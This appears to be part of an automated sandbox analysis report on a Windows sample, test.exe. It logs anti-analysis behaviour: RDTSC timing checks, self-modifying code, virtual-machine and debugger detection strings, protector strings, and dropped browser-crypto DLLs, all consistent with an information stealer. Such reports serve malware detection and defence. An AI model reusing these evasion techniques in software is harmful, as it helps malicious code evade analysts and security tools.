              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F4DF5B second address: F4DF79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F403D12A5C8h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F55696 second address: F5569C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F5569C second address: F556EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F403D12A5C6h 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F403D12A5C8h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F403D12A5C0h 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F556EF second address: F556F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F556F5 second address: F55714 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F403D12A5C8h 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F5475B second address: F5475F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F548A8 second address: F548AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F548AE second address: F548B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F553B3 second address: F553CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F403D12A5C0h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F553CD second address: F553D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F57D87 second address: F57D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F57D8D second address: F57D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F57D91 second address: F57D95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F57D95 second address: F57D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F660A3 second address: F660C3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F403D12A5CAh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F660C3 second address: F660CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F403C75C8F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F660CD second address: F660E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5C8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: F660E9 second address: F66103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jc 00007F403C75C8F6h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop edi 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: F686CA second address: F686D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: F628CF second address: F628D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: F628D3 second address: F628DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: F628DC second address: F628E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: F76624 second address: F76629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: F76629 second address: F76634 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: F8C557 second address: F8C565 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5BAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: F8C565 second address: F8C58A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jbe 00007F403C75C91Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F403C75C904h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: F8C58A second address: F8C595 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: F8C6B9 second address: F8C6BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: F8C6BE second address: F8C6C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: F8C6C4 second address: F8C6CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: F8C6CA second address: F8C6CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: F8C6CE second address: F8C6D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: F8C6D4 second address: F8C710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jc 00007F403D12A5D2h 0x0000000f jmp 00007F403D12A5BFh 0x00000014 jmp 00007F403D12A5BDh 0x00000019 pushad 0x0000001a jmp 00007F403D12A5BCh 0x0000001f push eax 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: F8C9AE second address: F8C9B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: F8C9B6 second address: F8C9BF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: F8C9BF second address: F8C9E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F403C75C906h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: F8CF59 second address: F8CF5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: F8D0AC second address: F8D0B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: F8FDA0 second address: F8FDA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: F8FFD6 second address: F8FFDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: F902AC second address: F902C1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F403D12A5B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: F902C1 second address: F902E8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F403C75C8F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jl 00007F403C75C8F6h 0x00000011 pop eax 0x00000012 popad 0x00000013 mov eax, dword ptr [eax] 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F403C75C8FFh 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: F92CEE second address: F92CF3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: F94D3F second address: F94D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F403C75C8F6h 0x0000000a popad 0x0000000b jl 00007F403C75C906h 0x00000011 jmp 00007F403C75C900h 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: 55B0274 second address: 55B0278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: 55B0278 second address: 55B0294 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403C75C908h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: 55B0294 second address: 55B02C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 push ebx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esp 0x0000000c jmp 00007F403D12A5C4h 0x00000011 mov dword ptr [esp], ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 movsx edi, cx 0x0000001a mov di, si 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: 55B02C1 second address: 55B02FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403C75C8FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F403C75C8FBh 0x00000013 call 00007F403C75C908h 0x00000018 pop eax 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: 55B02FA second address: 55B0300 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: 55B03A2 second address: 55B03E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushfd 0x00000010 jmp 00007F403C75C905h 0x00000015 add ecx, 2221A5C6h 0x0000001b jmp 00007F403C75C901h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: 55B044B second address: 55B044F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: 55B044F second address: 55B0462 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403C75C8FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: 55B0462 second address: 55B0474 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 push ebx 0x00000007 pop esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: 55B0474 second address: 55B0478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: 55B0478 second address: 55B047E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: 55B0582 second address: 55B05E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403C75C8FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a and dword ptr [ebp-04h], 00000000h 0x0000000e jmp 00007F403C75C900h 0x00000013 mov edx, dword ptr [ebp+0Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 call 00007F403C75C8FDh 0x0000001e pop eax 0x0000001f pushfd 0x00000020 jmp 00007F403C75C901h 0x00000025 add esi, 6B7C4FA6h 0x0000002b jmp 00007F403C75C901h 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: 55B05E4 second address: 55B0619 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, edx 0x0000000b jmp 00007F403D12A5BEh 0x00000010 mov al, byte ptr [edx] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F403D12A5BAh 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: 55B0619 second address: 55B061F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: 55B061F second address: 55B0625 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: 55B0625 second address: 55B0619 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403C75C908h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b inc edx 0x0000000c jmp 00007F403C75C900h 0x00000011 test al, al 0x00000013 jmp 00007F403C75C900h 0x00000018 jne 00007F403C75C893h 0x0000001e mov al, byte ptr [edx] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F403C75C8FAh 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: 55B072D second address: 55B0778 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F403D12A5C7h 0x00000008 pop eax 0x00000009 push edx 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov al, byte ptr [edi+01h] 0x00000011 pushad 0x00000012 mov ebx, 16570154h 0x00000017 pushfd 0x00000018 jmp 00007F403D12A5BDh 0x0000001d jmp 00007F403D12A5BBh 0x00000022 popfd 0x00000023 popad 0x00000024 inc edi 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: 55B0778 second address: 55B077C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: 55B077C second address: 55B0782 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: 55B0782 second address: 55B07AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403C75C8FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F403C75C907h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: 55B07AB second address: 55B0851 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 pushfd 0x00000007 jmp 00007F403D12A5C0h 0x0000000c xor eax, 25C249C8h 0x00000012 jmp 00007F403D12A5BBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b jne 00007F40AE86285Eh 0x00000021 jmp 00007F403D12A5C6h 0x00000026 mov ecx, edx 0x00000028 jmp 00007F403D12A5C0h 0x0000002d shr ecx, 02h 0x00000030 jmp 00007F403D12A5C0h 0x00000035 rep movsd 0x00000037 rep movsd 0x00000039 rep movsd 0x0000003b rep movsd 0x0000003d rep movsd 0x0000003f pushad 0x00000040 pushad 0x00000041 pushfd 0x00000042 jmp 00007F403D12A5BCh 0x00000047 add al, FFFFFFB8h 0x0000004a jmp 00007F403D12A5BBh 0x0000004f popfd 0x00000050 push ecx 0x00000051 pop ebx 0x00000052 popad 0x00000053 call 00007F403D12A5C4h 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: 55B0851 second address: 55B089F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov ecx, edx 0x00000008 jmp 00007F403C75C907h 0x0000000d and ecx, 03h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F403C75C904h 0x00000017 add si, 35A8h 0x0000001c jmp 00007F403C75C8FBh 0x00000021 popfd 0x00000022 pushad 0x00000023 push esi 0x00000024 pop edi 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: 55B09EB second address: 55B0A02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exe | Special instruction interceptor: First address: CFFA67 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\test.exe | Special instruction interceptor: First address: CFFB66 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\test.exe | Special instruction interceptor: First address: EB5BE9 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\test.exe | Special instruction interceptor: First address: CFFA80 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\test.exe | Special instruction interceptor: First address: F32D73 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\test.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\test.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\test.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\test.exe | Dropped PE file which has not been started: C:\ProgramData\nss3.dll
              Source: C:\Users\user\Desktop\test.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll
              Source: C:\Users\user\Desktop\test.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll
              Source: C:\Users\user\Desktop\test.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll
              Source: C:\Users\user\Desktop\test.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll
              Source: C:\Users\user\Desktop\test.exe | Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
              Source: C:\Users\user\Desktop\test.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll
              Source: C:\Users\user\Desktop\test.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll
              Source: C:\Users\user\Desktop\test.exe | Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
              Source: C:\Users\user\Desktop\test.exe | API coverage: 0.8 %
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCCC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc,0_2_6CCCC930
              Source: C:\Users\user\Desktop\test.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
              Source: C:\Users\user\Desktop\test.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
              Source: C:\Users\user\Desktop\test.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
              Source: C:\Users\user\Desktop\test.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
              Source: C:\Users\user\Desktop\test.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
              Source: C:\Users\user\Desktop\test.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
              Source: test.exe, test.exe, 00000000.00000002.1455992478.0000000000E84000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: test.exe, 00000000.00000002.1456721417.00000000017D3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWX
              Source: test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWs
              Source: test.exe, 00000000.00000002.1456721417.000000000178E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000003.1362964366.0000000001803000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: test.exe, 00000000.00000002.1455992478.0000000000E84000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\test.exe | System information queried: ModuleInformation
              Source: C:\Users\user\Desktop\test.exe | Process information queried: ProcessInformation

              Anti Debugging

              Source: C:\Users\user\Desktop\test.exe | Thread information set: HideFromDebugger
              Source: C:\Users\user\Desktop\test.exe | Open window title or class name: regmonclass
              Source: C:\Users\user\Desktop\test.exe | Open window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\test.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\test.exe | Open window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\test.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\test.exe | Open window title or class name: ollydbg
              Source: C:\Users\user\Desktop\test.exe | Open window title or class name: filemonclass
              Source: C:\Users\user\Desktop\test.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\test.exe | File opened: NTICE
              Source: C:\Users\user\Desktop\test.exe | File opened: SICE
              Source: C:\Users\user\Desktop\test.exe | File opened: SIWVID
              Source: C:\Users\user\Desktop\test.exe | Process queried: DebugPort
              Source: C:\Users\user\Desktop\test.exe | Process queried: DebugPort
              Source: C:\Users\user\Desktop\test.exe | Process queried: DebugPort
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CD15FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,0_2_6CD15FF0
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCB3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime,0_2_6CCB3480
